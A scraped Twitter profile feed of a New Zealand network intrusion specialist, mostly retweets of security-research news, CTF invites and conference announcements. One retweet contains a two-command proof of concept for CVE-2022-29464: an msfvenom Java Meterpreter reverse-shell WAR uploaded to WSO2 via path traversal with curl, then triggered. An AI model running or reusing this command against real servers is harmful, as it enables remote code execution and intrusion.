antic0de

3.2K posts

antic0de

antic0de

@antic0de

Network Intrusion Specialist

Katılım Ekim 2008
390 Takip Edilen9.2K Takipçiler
antic0de
antic0de@antic0de·
So ends an era of the New Zealand scene that lasted well over a decade. Shout outs to all of the people who worked to contribute to this epic period of history. Congrats of course to those founders and owners that made it through to this point. Waiting now for the next wave.
English
0
0
14
3.7K
antic0de retweetledi
haroon meer
haroon meer@haroonmeer·
The first 15 minutes of this weeks @riskybusiness is why we build @ThinkstCanary (and why it works). - Attackers know there’s value in arb file shares; - Attackers know there are creds in random text files. Canaries && Canarytokens let defenders know when they are being touched
English
0
4
29
0
antic0de
antic0de@antic0de·
@wdormann We have never talked directly, but I’ve always followed your work and been impressed how much knowledge you had across such a wide field
English
0
0
2
0
antic0de retweetledi
pwn.ai
pwn.ai@pwn_ai·
Can you bypass authentication by exploiting a vulnerability? 10$ for first solver! 💢🔥 octagon.net/chal/3.php
pwn.ai tweet media
English
45
106
787
0
antic0de retweetledi
CyberCX
CyberCX@CyberCX·
Congrats to our team members selected to join Team Oceania at the inaugural International #Cybersecurity Challenge CyberCX is proud to sponsor Team Oceania in the competition, which will be held in Athens, Greece from 14-17 June Find out more here: austiccquals.uqcloud.net
CyberCX tweet media
English
0
1
11
0
Dave Aitel
Dave Aitel@daveaitel·
"you don't hack any more. You've never even hacked." -16yo
English
8
1
62
0
antic0de retweetledi
Jeremy Blackthorne
Jeremy Blackthorne@0xJeremy·
From a VR student today on our ROP chain lessons. I'm dying 😂: "This week's been like"
English
19
622
2.4K
0
antic0de retweetledi
wvu
wvu@wvuuuuuuuuuuuuu·
CVE-2022-29464 PoC for this in two commands... 1. msfvenom -p java/meterpreter/reverse_tcp -f war lhost=192.168.0.6 | curl -kv https://192.168.0.6:9443/fileupload/toolsAny -F ../../../../repository/deployment/server/webapps/x.war=@- 2. curl -kv https://192.168.0.6:9443/x :/
wvu@wvuuuuuuuuuuuuu

On WSO2 CVE-2022-29464... you'll definitely want to check for deployed WAR files in addition to JSP. Confirmed a full Java Meterpreter shell for this.

English
7
75
242
0
antic0de retweetledi
Louis Nyffenegger
Louis Nyffenegger@snyff·
If you are using JWT+Java+EC, you should probably grep your logs for MAYCAQACAQA
English
2
11
66
0
antic0de retweetledi
kawaiicon
kawaiicon@kawaiiconNZ·
Launch Update: Kawaiicon 2 are continuing to target July 1-2 2022 for launch. ✨Wave 1 of ticket sales to open midday Friday.✨ This is not a drill! What will Kawaiicon 2 look like this year? SO GLAD YOU ASKED.
English
5
35
89
0
antic0de retweetledi
Connor McGarr
Connor McGarr@33y0re·
12 ROP chains later - from CVE-2019-0567 crash POC to code execution. ASLR, DEP, & CFG bypass + ACG bypass using (since-patched) CVE-2017-8637 to abuse the way Chakra-based Edge handled (pun intended) supplying a handle from the out-of-process JIT server to a content process.
English
5
84
387
0
antic0de retweetledi
chompie
chompie@chompie1337·
Thrilled to share my new blog post: Put an io_uring on it: Exploiting the Linux kernel. Follow me while I learn a new kernel subsystem + its attack surface, find an 0day, build an exploit, + come up with some new tricks. I go deep and demystify the process graplsecurity.com/post/iou-ring-…
English
41
604
2.2K
0
antic0de retweetledi
Gil Dabah
Gil Dabah@_arkon·
Guys & girls! Exactly a year ago I promised over 15 bugs in win32k. You're welcome to read and find out about my biggest research so far: #win32k #SmashTheRef bug class - github.com/gdabah/win32k-… Check out the paper and the POCs, there are some crazy stuff going on. Promise!
English
12
336
751
0
antic0de retweetledi
tmp.0ut
tmp.0ut@tmpout·
We are pleased to announce tmp.0ut Volume 2 tmpout.sh/2/
tmp.0ut tweet media
English
16
571
1.6K
0
antic0de retweetledi
Álvaro Prieto
Álvaro Prieto@alvaroprieto·
Ever wanted to debug your microcontroller over USB-C? (I'm talking JTAG/SWD, not just USB!) If you already have a USB-C connector, there's no need to have an additional connector to program (or tag-connect pads, which are super nice) Here's one way to do it: 🧵
Álvaro Prieto tweet media
English
21
152
772
0